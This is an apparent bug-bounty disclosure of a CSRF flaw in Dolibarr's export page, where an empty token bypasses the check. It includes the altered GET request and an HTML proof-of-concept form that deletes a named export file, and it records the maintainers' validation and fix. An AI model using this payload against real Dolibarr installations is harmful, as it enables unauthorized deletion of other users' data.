Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Reported on Jul 18th 2021

✍️ Description

Attacker can delete any Exports for any user with CSRF vulnerability when the Admin or SuperAdmin or an authorized user click on PoC.html file, it is enough to attacker know the Export's names on server.

I convert the

/exports/export.php?step=5&datatoexport=commande_1&file=filename.extension&action=confirm_deletefile&confirm=yes&token=8499305eb2e675f6252d06550f06b0b5 HTTP/2

to this

GET /exports/export.php?step=5&datatoexport=commande_1&file=filename.extension&action=confirm_deletefile&token=&confirm=yes HTTP/2

and then the CSRF token baypassed.

🕵️‍♂️ Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="step" value="5" />
      <input type="hidden" name="datatoexport" value="commande&#95;1" />
      <input type="hidden" name="file" value="export&#95;categorie&#95;1&#95;supplier&#46;csv" />
      <input type="hidden" name="action" value="confirm&#95;deletefile" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="submit" value="Submit request" />

Here in PoC.html the file name is export_categorie_1_supplier.csv that successfully I delete it with CSRF vulnerability.

💥 Impact

This vulnerability is capable of Delete any Export.

We have contacted a member of the dolibarr team and are waiting to hear back 8 days ago
Laurent Destailleur validated this vulnerability 6 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on c2f178 6 days ago
Laurent Destailleur has been awarded the fix bounty